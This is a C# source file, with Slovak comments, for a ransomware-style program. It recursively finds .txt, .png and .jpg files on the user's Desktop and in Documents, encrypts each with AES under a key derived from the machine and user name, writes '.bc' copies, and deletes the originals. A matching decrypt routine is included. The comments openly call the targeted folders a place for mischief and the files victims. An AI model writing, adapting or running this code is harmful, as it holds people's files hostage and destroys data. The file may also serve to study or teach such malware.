using System;
using System.Collections.Generic;
using System.Linq;
using System.Text;
using System.IO;
using System.Diagnostics;
using System.Security.Cryptography;
using System.Threading;
namespace Paws
    class Woof
    {
        List<String> m_files;
        RandomNumberGenerator m_rng;
        public Woof()
        {
            m_files = new List<string>();
            m_rng = RandomNumberGenerator.Create();
        }
        public void doEncrypt(Action<int,int> updateProgress)
        {
            // subory ktore hladame
            //TODO: doplnit
            var extensions = new List<String> {
                ".txt",
                ".png",
                ".jpg"
            };
            // cleanup
            m_files.Clear();
            // najdime subory na sifrovanie
            FindFiles(extensions);
            // update progress
            if (updateProgress!=null)
                updateProgress(0, m_files.Count);
            
            // sifrovanie
            int i = 0;
            foreach (String file in m_files)
            {
                this.encryptFile(file);
                if (updateProgress != null)
                    updateProgress(++i, m_files.Count);
            }
        }
        public void doDecrypt(Action<int, int> updateProgress)
        {
            // subory ktore hladame
            var extensions = new List<String> {
                ".bc",
            };
            // cleanup
            m_files.Clear();
            // najdime subory na sifrovanie
            FindFiles(extensions);
            // update progress
            if (updateProgress != null)
                updateProgress(0, m_files.Count);
            // sifrovanie 
            int i = 0;
            foreach (String file in m_files)
            {
                if (updateProgress != null)
                    updateProgress(++i, m_files.Count);
                this.decryptFile(file);
            }
        }
        protected void FindFiles(List<String> extensions)
        {
            // adresare kde robime zlobu
            //TODO: doplnit?
            var dirs = new List<String> {
                Environment.GetFolderPath(Environment.SpecialFolder.DesktopDirectory),
                Environment.GetFolderPath(Environment.SpecialFolder.MyDocuments)
            };
            // najdime subory na obetovanie
            foreach (String dir in dirs)
            {
                this.FindFilesWalkDir(dir, extensions);
            }
        }
        protected void FindFilesWalkDir(String dir, List<String> extensions)
        {
            // pridajme subory z tohoto adresaru do zoznamu
            var files = Directory
                .GetFiles(dir, "*.*", SearchOption.TopDirectoryOnly)
                .Where(f => extensions.IndexOf(Path.GetExtension(f)) >= 0)
                .ToList();
            m_files.AddRange(files);
            // vyskusajme ist nizsie
            try
            {
                foreach (string folder in Directory.GetDirectories(dir))
                {
                    FindFilesWalkDir(folder, extensions);
                }
            }
            catch (UnauthorizedAccessException) { }
        }
        private byte[] genKey()
        {
            String sKey = System.Environment.MachineName + System.Environment.UserName;
            Rfc2898DeriveBytes k = new Rfc2898DeriveBytes(sKey, Encoding.ASCII.GetBytes("krokodil"), 4000);
            byte[] res = k.GetBytes(32);
            return res;
        }
        private void encryptFile(String file)
        {
            // nahodne iv
            byte[] iv = new byte[16];
            m_rng.GetBytes(iv);
            // rijndael 128 cbc
            AesManaged c = new AesManaged() { Mode = CipherMode.CBC, Padding = PaddingMode.Zeros };
            ICryptoTransform trans = c.CreateEncryptor(this.genKey(), iv);
            // povodny a vysstupny subor
            FileStream fIn = new FileStream(file, FileMode.Open, FileAccess.Read);
            FileStream fOut = new FileStream(file + ".bc", FileMode.OpenOrCreate, FileAccess.Write);
            // 16B IV, 8B povodna dlzka
            fOut.Write(iv, 0, 16);
            fOut.Write(BitConverter.GetBytes(fIn.Length), 0, 8);
            // data and pad
            CryptoStream cs = new CryptoStream((Stream)fOut, trans, CryptoStreamMode.Write);
            fIn.CopyTo((Stream)cs);
            cs.FlushFinalBlock();
            // cleanup
            fIn.Dispose();
            cs.Dispose();
            File.Delete(file);
        }
        private bool decryptFile(String file)
        {
            long len = 0;
            byte[] buf = new byte[8];
            byte[] iv = new byte[16];
            // povodny a vysstupny subor
            FileStream fIn = new FileStream(file, FileMode.Open, FileAccess.Read);
            FileStream fOut = new FileStream(file.Remove(file.Length - 3), FileMode.OpenOrCreate, FileAccess.Write);
            // hlavicka?
            if (fIn.Length < 24)
                return false;
            fIn.Read(iv, 0, 16);
            fIn.Read(buf, 0, 8);
            len = BitConverter.ToInt64(buf, 0);
            // kratky subor
            if (fIn.Length < 24 + len)
                return false;
            // rijndael 128 cbc
            AesManaged c = new AesManaged() { Mode = CipherMode.CBC, Padding = PaddingMode.Zeros };
            ICryptoTransform trans = c.CreateDecryptor(this.genKey(), iv);
            CryptoStream cs = new CryptoStream((Stream)fOut, trans, CryptoStreamMode.Write);
            // data and truncate
            fIn.CopyTo((Stream)cs);
            fOut.SetLength(len);
            // cleanup
            fIn.Dispose();
            cs.Dispose();
            File.Delete(file);
            return true;
        }
    }
